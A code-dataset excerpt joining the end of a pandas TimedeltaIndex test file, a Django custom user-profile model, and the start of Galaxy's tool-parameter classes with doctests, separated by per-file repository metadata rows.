self.assertRaises(ValueError, idx.astype, 'datetime64')
self.assertRaises(ValueError, idx.astype, 'datetime64[ns]')
def test_get_loc(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
for method in [None, 'pad', 'backfill', 'nearest']:
self.assertEqual(idx.get_loc(idx[1], method), 1)
self.assertEqual(idx.get_loc(idx[1].to_pytimedelta(), method), 1)
self.assertEqual(idx.get_loc(str(idx[1]), method), 1)
self.assertEqual(
idx.get_loc(idx[1], 'pad', tolerance=pd.Timedelta(0)), 1)
self.assertEqual(
idx.get_loc(idx[1], 'pad', tolerance=np.timedelta64(0, 's')), 1)
self.assertEqual(idx.get_loc(idx[1], 'pad', tolerance=timedelta(0)), 1)
with tm.assertRaisesRegexp(ValueError, 'must be convertible'):
idx.get_loc(idx[1], method='nearest', tolerance='foo')
for method, loc in [('pad', 1), ('backfill', 2), ('nearest', 1)]:
self.assertEqual(idx.get_loc('1 day 1 hour', method), loc)
def test_get_indexer(self):
idx = pd.to_timedelta(['0 days', '1 days', '2 days'])
tm.assert_numpy_array_equal(idx.get_indexer(idx),
np.array([0, 1, 2], dtype=np.intp))
target = pd.to_timedelta(['-1 hour', '12 hours', '1 day 1 hour'])
tm.assert_numpy_array_equal(idx.get_indexer(target, 'pad'),
np.array([-1, 0, 1], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'backfill'),
np.array([0, 1, 2], dtype=np.intp))
tm.assert_numpy_array_equal(idx.get_indexer(target, 'nearest'),
np.array([0, 1, 1], dtype=np.intp))
res = idx.get_indexer(target, 'nearest',
tolerance=pd.Timedelta('1 hour'))
tm.assert_numpy_array_equal(res, np.array([0, -1, 1], dtype=np.intp))
def test_numeric_compat(self):
idx = self._holder(np.arange(5, dtype='int64'))
didx = self._holder(np.arange(5, dtype='int64') ** 2)
result = idx * 1
tm.assert_index_equal(result, idx)
result = 1 * idx
tm.assert_index_equal(result, idx)
result = idx / 1
tm.assert_index_equal(result, idx)
result = idx // 1
tm.assert_index_equal(result, idx)
result = idx * np.array(5, dtype='int64')
tm.assert_index_equal(result,
self._holder(np.arange(5, dtype='int64') * 5))
result = idx * np.arange(5, dtype='int64')
tm.assert_index_equal(result, didx)
result = idx * Series(np.arange(5, dtype='int64'))
tm.assert_index_equal(result, didx)
result = idx * Series(np.arange(5, dtype='float64') + 0.1)
tm.assert_index_equal(result, self._holder(np.arange(
5, dtype='float64') * (np.arange(5, dtype='float64') + 0.1)))
# invalid
self.assertRaises(TypeError, lambda: idx * idx)
self.assertRaises(ValueError, lambda: idx * self._holder(np.arange(3)))
self.assertRaises(ValueError, lambda: idx * np.array([1, 2]))
def test_pickle_compat_construction(self):
pass
def test_ufunc_coercions(self):
# normal ops are also tested in tseries/test_timedeltas.py
idx = TimedeltaIndex(['2H', '4H', '6H', '8H', '10H'],
freq='2H', name='x')
for result in [idx * 2, np.multiply(idx, 2)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['4H', '8H', '12H', '16H', '20H'],
freq='4H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '4H')
for result in [idx / 2, np.divide(idx, 2)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['1H', '2H', '3H', '4H', '5H'],
freq='H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, 'H')
idx = TimedeltaIndex(['2H', '4H', '6H', '8H', '10H'],
freq='2H', name='x')
for result in [-idx, np.negative(idx)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['-2H', '-4H', '-6H', '-8H', '-10H'],
freq='-2H', name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, '-2H')
idx = TimedeltaIndex(['-2H', '-1H', '0H', '1H', '2H'],
freq='H', name='x')
for result in [abs(idx), np.absolute(idx)]:
tm.assertIsInstance(result, TimedeltaIndex)
exp = TimedeltaIndex(['2H', '1H', '0H', '1H', '2H'],
freq=None, name='x')
tm.assert_index_equal(result, exp)
self.assertEqual(result.freq, None)
def test_fillna_timedelta(self):
# GH 11343
idx = pd.TimedeltaIndex(['1 day', pd.NaT, '3 day'])
exp = pd.TimedeltaIndex(['1 day', '2 day', '3 day'])
self.assert_index_equal(idx.fillna(pd.Timedelta('2 day')), exp)
exp = pd.TimedeltaIndex(['1 day', '3 hour', '3 day'])
idx.fillna(pd.Timedelta('3 hour'))
exp = pd.Index(
[pd.Timedelta('1 day'), 'x', pd.Timedelta('3 day')], dtype=object)
self.assert_index_equal(idx.fillna('x'), exp)
def test_difference_freq(self):
# GH14323: Difference of TimedeltaIndex should not preserve frequency
index = timedelta_range("0 days", "5 days", freq="D")
other = timedelta_range("1 days", "4 days", freq="D")
expected = TimedeltaIndex(["0 days", "5 days"], freq=None)
idx_diff = index.difference(other)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
other = timedelta_range("2 days", "5 days", freq="D")
idx_diff = index.difference(other)
expected = TimedeltaIndex(["0 days", "1 days"], freq=None)
tm.assert_index_equal(idx_diff, expected)
tm.assert_attr_equal('freq', idx_diff, expected)
| 42.910194
| 79
| 0.559628
|
2500be4000abaf728c758dcddcccf9ef592e409e
| 2,946
|
py
|
Python
|
profiles_api/models.py
|
apoorvpd/profile-rest-api
|
0214d7379a7911f70266ae9a3e088c8b3cd99965
|
[
"MIT"
] | null | null | null |
profiles_api/models.py
|
apoorvpd/profile-rest-api
|
0214d7379a7911f70266ae9a3e088c8b3cd99965
|
[
"MIT"
] | null | null | null |
profiles_api/models.py
|
apoorvpd/profile-rest-api
|
0214d7379a7911f70266ae9a3e088c8b3cd99965
|
[
"MIT"
] | null | null | null |
from django.db import models
# These are the standard base classes that you need to use when overriding or customizing the default Django user model.
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
# Create your models here.
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""Create a new user profile"""
if not email:
raise ValueError('User must have an email address')
email = self.normalize_email(email)
user = self.model(email=email, name=name)
user.set_password(password) # password is encrypted
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""Create and save a new superuser with given details"""
user = self.create_user(email=email, name=name, password=password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser, PermissionsMixin):
"""Database model for users in the system"""
# Every email address in the database must be unique
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
# This is a field that we can use to determine if a user's profile is activated or not.
# By default, we are going to set all of them to be activated as True. But, this allows us to deactivate users
# if we need at some point in the future.
is_active = models.BooleanField(default=True)
# staff user has access to admin interface.
is_staff = models.BooleanField(default=False)
# Model Manager that we are going to use for the objects. This is required because we will use our custom UserProfile model
# with the Django CLI. So, Django needs to have a custom model manager for the UserProfile model, so that it knows how to create users
# and control the users using the Django command line tools.
objects = UserProfileManager()
# When we authenticate users instead of them providing username and password, they are just going to provide email address and password.
USERNAME_FIELD = 'email'
# USERNAME_FIELD is required by default. And, then additional required fields specified in REQUIRED_FIELDS
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of the user"""
return self.name
def get_short_name(self):
"""Retrieve short name of the user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
| 40.916667
| 142
| 0.672777
|
2ae9493da80687bf3ab76bc520e48f006c3166fc
| 110,898
|
py
|
Python
|
lib/galaxy/tools/parameters/basic.py
|
nomadscientist/galaxy
|
5187be208d9a33ca53359283c850b075c943ad86
|
[
"CC-BY-3.0"
] | null | null | null |
lib/galaxy/tools/parameters/basic.py
|
nomadscientist/galaxy
|
5187be208d9a33ca53359283c850b075c943ad86
|
[
"CC-BY-3.0"
] | null | null | null |
lib/galaxy/tools/parameters/basic.py
|
nomadscientist/galaxy
|
5187be208d9a33ca53359283c850b075c943ad86
|
[
"CC-BY-3.0"
] | null | null | null |
"""
Basic tool parameters.
"""
import contextlib
import json
import logging
import os
import os.path
import re
from webob.compat import cgi_FieldStorage
import galaxy.model
from galaxy import util
from galaxy.tool_util.parser import get_input_source as ensure_input_source
from galaxy.util import (
dbkeys,
sanitize_param,
string_as_bool,
string_as_bool_or_none,
unicodify,
XML,
)
from galaxy.util.dictifiable import Dictifiable
from galaxy.util.expressions import ExpressionContext
from galaxy.util.rules_dsl import RuleSet
from . import (
dynamic_options,
history_query,
validation
)
from .dataset_matcher import (
get_dataset_matcher_factory,
)
from .sanitize import ToolParameterSanitizer
log = logging.getLogger(__name__)
class workflow_building_modes:
DISABLED = False
ENABLED = True
USE_HISTORY = 1
WORKFLOW_PARAMETER_REGULAR_EXPRESSION = re.compile(r'\$\{.+?\}')
class ImplicitConversionRequired(Exception):
pass
def contains_workflow_parameter(value, search=False):
if not isinstance(value, str):
return False
if search and WORKFLOW_PARAMETER_REGULAR_EXPRESSION.search(value):
return True
if not search and WORKFLOW_PARAMETER_REGULAR_EXPRESSION.match(value):
return True
return False
def is_runtime_value(value):
return isinstance(value, RuntimeValue) or (isinstance(value, dict)
and value.get("__class__") in ["RuntimeValue", "ConnectedValue"])
def is_runtime_context(trans, other_values):
if trans.workflow_building_mode:
return True
for context_value in other_values.values():
if is_runtime_value(context_value):
return True
for v in util.listify(context_value):
if isinstance(v, trans.app.model.HistoryDatasetAssociation) and \
((hasattr(v, 'state') and v.state != galaxy.model.Dataset.states.OK)
or hasattr(v, 'implicit_conversion')):
return True
return False
def parse_dynamic_options(param, input_source):
options_elem = input_source.parse_dynamic_options_elem()
if options_elem is not None:
return dynamic_options.DynamicOptions(options_elem, param)
return None
# Describe a parameter value error where there is no actual supplied
# parameter - e.g. just a specification issue.
NO_PARAMETER_VALUE = object()
@contextlib.contextmanager
def assert_throws_param_value_error(message):
exception_thrown = False
try:
yield
except ParameterValueError as e:
exception_thrown = True
assert str(e) == message
assert exception_thrown
class ParameterValueError(ValueError):
def __init__(self, message_suffix, parameter_name, parameter_value=NO_PARAMETER_VALUE, is_dynamic=None):
message = f"parameter '{parameter_name}': {message_suffix}"
super().__init__(message)
self.message_suffix = message_suffix
self.parameter_name = parameter_name
self.parameter_value = parameter_value
self.is_dynamic = is_dynamic
def to_dict(self):
as_dict = {"message": unicodify(self)}
as_dict["message_suffix"] = self.message_suffix
as_dict["parameter_name"] = self.parameter_name
if self.parameter_value is not NO_PARAMETER_VALUE:
as_dict["parameter_value"] = self.parameter_value
if self.is_dynamic is not None:
as_dict["is_dynamic"] = self.is_dynamic
return as_dict
class ToolParameter(Dictifiable):
"""
Describes a parameter accepted by a tool. This is just a simple stub at the
moment but in the future should encapsulate more complex parameters (lists
of valid choices, validation logic, ...)
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None)
>>> p = ToolParameter(None, XML('<param argument="--parameter-name" type="text" value="default" />'))
>>> assert p.name == 'parameter_name'
>>> assert sorted(p.to_dict(trans).items()) == [('argument', '--parameter-name'), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'ToolParameter'), ('name', 'parameter_name'), ('optional', False), ('refresh_on_change', False), ('type', 'text'), ('value', None)]
"""
dict_collection_visible_keys = ['name', 'argument', 'type', 'label', 'help', 'refresh_on_change']
def __init__(self, tool, input_source, context=None):
input_source = ensure_input_source(input_source)
self.tool = tool
self.argument = input_source.get("argument")
self.name = self.__class__.parse_name(input_source)
self.type = input_source.get("type")
self.hidden = input_source.get_bool("hidden", False)
self.refresh_on_change = input_source.get_bool("refresh_on_change", False)
self.optional = input_source.parse_optional()
self.is_dynamic = False
self.label = input_source.parse_label()
self.help = input_source.parse_help()
sanitizer_elem = input_source.parse_sanitizer_elem()
if sanitizer_elem is not None:
self.sanitizer = ToolParameterSanitizer.from_element(sanitizer_elem)
else:
self.sanitizer = None
self.validators = []
for elem in input_source.parse_validator_elems():
self.validators.append(validation.Validator.from_element(self, elem))
@property
def visible(self):
"""Return true if the parameter should be rendered on the form"""
return True
def get_label(self):
"""Return user friendly name for the parameter"""
return self.label if self.label else self.name
def from_json(self, value, trans=None, other_values=None):
"""
Convert a value from an HTML POST into the parameters preferred value
format.
"""
return value
def get_initial_value(self, trans, other_values):
"""
Return the starting value of the parameter
"""
return None
def get_required_enctype(self):
"""
If this parameter needs the form to have a specific encoding
return it, otherwise return None (indicating compatibility with
any encoding)
"""
return None
def get_dependencies(self):
"""
Return the names of any other parameters this parameter depends on
"""
return []
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
return unicodify(value)
def to_python(self, value, app):
"""Convert a value created with to_json back to an object representation"""
return value
def value_to_basic(self, value, app, use_security=False):
if is_runtime_value(value):
return runtime_to_json(value)
return self.to_json(value, app, use_security)
def value_from_basic(self, value, app, ignore_errors=False):
# Handle Runtime and Unvalidated values
if is_runtime_value(value):
if isinstance(self, HiddenToolParameter):
raise ParameterValueError(message_suffix='Runtime Parameter not valid', parameter_name=self.name)
return runtime_to_object(value)
elif isinstance(value, dict) and value.get('__class__') == 'UnvalidatedValue':
return value['value']
# Delegate to the 'to_python' method
if ignore_errors:
try:
return self.to_python(value, app)
except Exception:
return value
else:
return self.to_python(value, app)
def value_to_display_text(self, value):
if is_runtime_value(value):
return "Not available."
return self.to_text(value)
def to_text(self, value):
"""
Convert a value to a text representation suitable for displaying to
the user
>>> p = ToolParameter(None, XML('<param name="_name" />'))
>>> print(p.to_text(None))
Not available.
>>> print(p.to_text(''))
Empty.
>>> print(p.to_text('text'))
text
>>> print(p.to_text(True))
True
>>> print(p.to_text(False))
False
>>> print(p.to_text(0))
0
"""
if value is not None:
str_value = unicodify(value)
if not str_value:
return "Empty."
return str_value
return "Not available."
def to_param_dict_string(self, value, other_values=None):
"""Called via __str__ when used in the Cheetah template"""
if value is None:
value = ""
elif not isinstance(value, str):
value = str(value)
if self.tool is None or self.tool.options.sanitize:
if self.sanitizer:
value = self.sanitizer.sanitize_param(value)
else:
value = sanitize_param(value)
return value
def validate(self, value, trans=None):
if value in ["", None] and self.optional:
return
for validator in self.validators:
validator.validate(value, trans)
def to_dict(self, trans, other_values=None):
""" to_dict tool parameter. This can be overridden by subclasses. """
other_values = other_values or {}
tool_dict = super().to_dict()
tool_dict['model_class'] = self.__class__.__name__
tool_dict['optional'] = self.optional
tool_dict['hidden'] = self.hidden
tool_dict['is_dynamic'] = self.is_dynamic
tool_dict['value'] = self.value_to_basic(self.get_initial_value(trans, other_values), trans.app, use_security=True)
return tool_dict
@classmethod
def build(cls, tool, input_source):
"""Factory method to create parameter of correct type"""
input_source = ensure_input_source(input_source)
param_name = cls.parse_name(input_source)
param_type = input_source.get('type')
if not param_type:
raise ValueError(f"parameter '{param_name}' requires a 'type'")
elif param_type not in parameter_types:
raise ValueError(f"parameter '{param_name}' uses an unknown type '{param_type}'")
else:
return parameter_types[param_type](tool, input_source)
@staticmethod
def parse_name(input_source):
return input_source.parse_name()
class SimpleTextToolParameter(ToolParameter):
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.optional = input_source.get_bool('optional', False)
if self.optional:
self.value = None
else:
self.value = ''
def to_json(self, value, app, use_security):
"""Convert a value to a string representation suitable for persisting"""
if value is None:
rval = '' if not self.optional else None
else:
rval = unicodify(value)
return rval
def get_initial_value(self, trans, other_values):
return self.value
class TextToolParameter(SimpleTextToolParameter):
"""
Parameter that can take on any text value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None)
>>> p = TextToolParameter(None, XML('<param name="_name" type="text" value="default" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'TextToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'text'), ('value', u'default')]
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.datalist = []
for (title, value, _) in input_source.parse_static_options():
self.datalist.append({'label': title, 'value': value})
self.value = input_source.get('value')
self.area = input_source.get_bool('area', False)
def validate(self, value, trans=None):
search = self.type == "text"
if not (trans and trans.workflow_building_mode is workflow_building_modes.ENABLED and contains_workflow_parameter(value, search=search)):
return super().validate(value, trans)
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
other_values = other_values or {}
d['area'] = self.area
d['datalist'] = self.datalist
d['optional'] = self.optional
return d
class IntegerToolParameter(TextToolParameter):
"""
Parameter that takes an integer value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=True)
>>> p = IntegerToolParameter(None, XML('<param name="_name" type="integer" value="10" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('max', None), ('min', None), ('model_class', 'IntegerToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'integer'), ('value', u'10')]
>>> assert type(p.from_json("10", trans)) == int
>>> with assert_throws_param_value_error("parameter '_name': an integer or workflow parameter is required"):
... p.from_json("_string", trans)
"""
dict_collection_visible_keys = ToolParameter.dict_collection_visible_keys + ['min', 'max']
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
if self.value:
try:
int(self.value)
except ValueError:
raise ParameterValueError("the attribute 'value' must be an integer", self.name)
elif self.value is None and not self.optional:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, None)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.min:
try:
self.min = int(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be an integer", self.name, self.min)
if self.max:
try:
self.max = int(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be an integer", self.name, self.max)
if self.min is not None or self.max is not None:
self.validators.append(validation.InRangeValidator(None, self.min, self.max))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
try:
return int(value)
except (TypeError, ValueError):
if contains_workflow_parameter(value) and trans.workflow_building_mode is workflow_building_modes.ENABLED:
return value
if not value and self.optional:
return ""
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
raise ParameterValueError("an integer or workflow parameter is required", self.name, value)
else:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, value)
def to_python(self, value, app):
try:
return int(value)
except (TypeError, ValueError) as err:
if contains_workflow_parameter(value):
return value
if not value and self.optional:
return None
raise err
def get_initial_value(self, trans, other_values):
if self.value not in {None, ''}:
return int(self.value)
else:
return None
class FloatToolParameter(TextToolParameter):
"""
Parameter that takes a real number value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=True)
>>> p = FloatToolParameter(None, XML('<param name="_name" type="float" value="3.141592" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('area', False), ('argument', None), ('datalist', []), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('max', None), ('min', None), ('model_class', 'FloatToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'float'), ('value', u'3.141592')]
>>> assert type(p.from_json("36.1", trans)) == float
>>> with assert_throws_param_value_error("parameter '_name': an integer or workflow parameter is required"):
... p.from_json("_string", trans)
"""
dict_collection_visible_keys = ToolParameter.dict_collection_visible_keys + ['min', 'max']
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.min = input_source.get('min')
self.max = input_source.get('max')
if self.value:
try:
float(self.value)
except ValueError:
raise ParameterValueError("the attribute 'value' must be a real number", self.name, self.value)
elif self.value is None and not self.optional:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, None)
if self.min:
try:
self.min = float(self.min)
except ValueError:
raise ParameterValueError("attribute 'min' must be a real number", self.name, self.min)
if self.max:
try:
self.max = float(self.max)
except ValueError:
raise ParameterValueError("attribute 'max' must be a real number", self.name, self.max)
if self.min is not None or self.max is not None:
self.validators.append(validation.InRangeValidator(None, self.min, self.max))
def from_json(self, value, trans, other_values=None):
other_values = other_values or {}
try:
return float(value)
except (TypeError, ValueError):
if contains_workflow_parameter(value) and trans.workflow_building_mode is workflow_building_modes.ENABLED:
return value
if not value and self.optional:
return ""
if trans.workflow_building_mode is workflow_building_modes.ENABLED:
raise ParameterValueError("an integer or workflow parameter is required", self.name, value)
else:
raise ParameterValueError("the attribute 'value' must be set for non optional parameters", self.name, value)
def to_python(self, value, app):
try:
return float(value)
except (TypeError, ValueError) as err:
if contains_workflow_parameter(value):
return value
if not value and self.optional:
return None
raise err
def get_initial_value(self, trans, other_values):
try:
return float(self.value)
except Exception:
return None
class BooleanToolParameter(ToolParameter):
"""
Parameter that takes one of two values.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = BooleanToolParameter(None, XML('<param name="_name" type="boolean" checked="yes" truevalue="_truevalue" falsevalue="_falsevalue" />'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('falsevalue', '_falsevalue'), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'BooleanToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('truevalue', '_truevalue'), ('type', 'boolean'), ('value', 'true')]
>>> print(p.from_json('true'))
True
>>> print(p.to_param_dict_string(True))
_truevalue
>>> print(p.from_json('false'))
False
>>> print(p.to_param_dict_string(False))
_falsevalue
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.truevalue = input_source.get('truevalue', 'true')
self.falsevalue = input_source.get('falsevalue', 'false')
nullable = input_source.get_bool('optional', False)
self.optional = nullable
self.checked = input_source.get_bool('checked', None if nullable else False)
def from_json(self, value, trans=None, other_values=None):
return self.to_python(value)
def to_python(self, value, app=None):
if not self.optional:
ret_val = string_as_bool(value)
else:
ret_val = string_as_bool_or_none(value)
return ret_val
def to_json(self, value, app, use_security):
rval = json.dumps(self.to_python(value, app))
return rval
def get_initial_value(self, trans, other_values):
return self.checked
def to_param_dict_string(self, value, other_values=None):
if self.to_python(value):
return self.truevalue
else:
return self.falsevalue
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['truevalue'] = self.truevalue
d['falsevalue'] = self.falsevalue
d['optional'] = self.optional
return d
@property
def legal_values(self):
return [self.truevalue, self.falsevalue]
class FileToolParameter(ToolParameter):
"""
Parameter that takes an uploaded file as a value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = FileToolParameter(None, XML('<param name="_name" type="file"/>'))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'FileToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'file'), ('value', None)]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
def from_json(self, value, trans=None, other_values=None):
# Middleware or proxies may encode files in special ways (TODO: this
# should be pluggable)
if type(value) == dict:
if 'session_id' in value:
# handle api upload
session_id = value["session_id"]
upload_store = trans.app.config.new_file_path
if re.match(r'^[\w-]+$', session_id) is None:
raise ValueError("Invalid session id format.")
local_filename = os.path.abspath(os.path.join(upload_store, session_id))
else:
# handle nginx upload
upload_store = trans.app.config.nginx_upload_store
assert upload_store, "Request appears to have been processed by nginx_upload_module but Galaxy is not configured to recognize it."
local_filename = os.path.abspath(value['path'])
assert local_filename.startswith(upload_store), f"Filename provided by nginx ({local_filename}) is not in correct directory ({upload_store})."
value = dict(filename=value["name"], local_filename=local_filename)
return value
def get_required_enctype(self):
"""
File upload elements require the multipart/form-data encoding
"""
return "multipart/form-data"
def to_json(self, value, app, use_security):
if value in [None, '']:
return None
elif isinstance(value, str):
return value
elif isinstance(value, dict):
# or should we jsonify?
try:
return value['local_filename']
except KeyError:
return None
elif isinstance(value, cgi_FieldStorage):
return value.filename
raise Exception("FileToolParameter cannot be persisted")
def to_python(self, value, app):
if value is None:
return None
elif isinstance(value, str):
return value
else:
raise Exception("FileToolParameter cannot be persisted")
class FTPFileToolParameter(ToolParameter):
"""
Parameter that takes a file uploaded via FTP as a value.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), user=None)
>>> p = FTPFileToolParameter(None, XML('<param name="_name" type="ftpfile"/>'))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
[('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'FTPFileToolParameter'), ('multiple', True), ('name', '_name'), ('optional', True), ('refresh_on_change', False), ('type', 'ftpfile'), ('value', None)]
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.multiple = input_source.get_bool('multiple', True)
self.optional = input_source.parse_optional(True)
self.user_ftp_dir = ''
def get_initial_value(self, trans, other_values):
if trans is not None:
if trans.user is not None:
self.user_ftp_dir = f"{trans.user_ftp_dir}/"
return None
@property
def visible(self):
if self.tool.app.config.ftp_upload_dir is None or self.tool.app.config.ftp_upload_site is None:
return False
return True
def to_param_dict_string(self, value, other_values=None):
if value == '':
return 'None'
lst = [f'{self.user_ftp_dir}{dataset}' for dataset in value]
if self.multiple:
return lst
else:
return lst[0]
def from_json(self, value, trans=None, other_values=None):
return self.to_python(value, trans.app, validate=True)
def to_json(self, value, app, use_security):
return self.to_python(value, app)
def to_python(self, value, app, validate=False):
if not isinstance(value, list):
value = [value]
lst = []
for val in value:
if val in [None, '']:
lst = []
break
if isinstance(val, dict):
lst.append(val['name'])
else:
lst.append(val)
if len(lst) == 0:
if not self.optional and validate:
raise ValueError("Please select a valid FTP file.")
return None
if validate and self.tool.app.config.ftp_upload_dir is None:
raise ValueError("The FTP directory is not configured.")
return lst
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
d['multiple'] = self.multiple
return d
class HiddenToolParameter(ToolParameter):
"""
Parameter that takes one of two values.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = HiddenToolParameter(None, XML('<param name="_name" type="hidden" value="_value"/>'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', True), ('is_dynamic', False), ('label', ''), ('model_class', 'HiddenToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'hidden'), ('value', u'_value')]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.value = input_source.get('value')
self.hidden = True
def get_initial_value(self, trans, other_values):
return self.value
def get_label(self):
return None
class ColorToolParameter(ToolParameter):
"""
Parameter that stores a color.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color" value="#ffffff"/>'))
>>> print(p.name)
_name
>>> print(p.to_param_dict_string("#ffffff"))
#ffffff
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', False), ('is_dynamic', False), ('label', ''), ('model_class', 'ColorToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'color'), ('value', u'#ffffff')]
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color"/>'))
>>> print(p.get_initial_value(trans, {}))
#000000
>>> p = ColorToolParameter(None, XML('<param name="_name" type="color" value="#ffffff" rgb="True"/>'))
>>> print(p.to_param_dict_string("#ffffff"))
(255, 255, 255)
>>> with assert_throws_param_value_error("parameter '_name': Failed to convert 'None' to RGB."):
... p.to_param_dict_string(None)
"""
def __init__(self, tool, input_source):
input_source = ensure_input_source(input_source)
super().__init__(tool, input_source)
self.value = input_source.get('value', '#000000')
self.rgb = input_source.get('rgb', False)
def get_initial_value(self, trans, other_values):
if self.value is not None:
return self.value.lower()
def to_param_dict_string(self, value, other_values=None):
if self.rgb:
try:
return str(tuple(int(value.lstrip('#')[i: i + 2], 16) for i in (0, 2, 4)))
except Exception:
raise ParameterValueError(f"Failed to convert '{value}' to RGB.", self.name)
return str(value)
class BaseURLToolParameter(HiddenToolParameter):
"""
Returns a parameter that contains its value prepended by the
current server base url. Used in all redirects.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch())
>>> p = BaseURLToolParameter(None, XML('<param name="_name" type="base_url" value="_value"/>'))
>>> print(p.name)
_name
>>> assert sorted(p.to_dict(trans).items()) == [('argument', None), ('help', ''), ('hidden', True), ('is_dynamic', False), ('label', ''), ('model_class', 'BaseURLToolParameter'), ('name', '_name'), ('optional', False), ('refresh_on_change', False), ('type', 'base_url'), ('value', u'_value')]
"""
def __init__(self, tool, input_source):
super().__init__(tool, input_source)
self.value = input_source.get('value', '')
def get_initial_value(self, trans, other_values):
return self._get_value(trans)
def from_json(self, value=None, trans=None, other_values=None):
return self._get_value(trans)
def _get_value(self, trans):
try:
if not self.value.startswith("/"):
raise Exception("baseurl value must start with a /")
return trans.qualified_url_builder(self.value)
except Exception as e:
log.debug('Url creation failed for "%s": %s', self.name, unicodify(e))
return self.value
def to_dict(self, trans, other_values=None):
d = super().to_dict(trans)
return d
class SelectToolParameter(ToolParameter):
"""
Parameter that takes on one (or many) or a specific set of values.
>>> from galaxy.util.bunch import Bunch
>>> trans = Bunch(app=None, history=Bunch(), workflow_building_mode=False)
>>> p = SelectToolParameter(None, XML(
... '''
... <param name="_name" type="select">
... <option value="x">x_label</option>
... <option value="y" selected="true">y_label</option>
... <option value="z">z_label</option>
... </param>
... '''))
>>> print(p.name)
_name
>>> sorted(p.to_dict(trans).items())
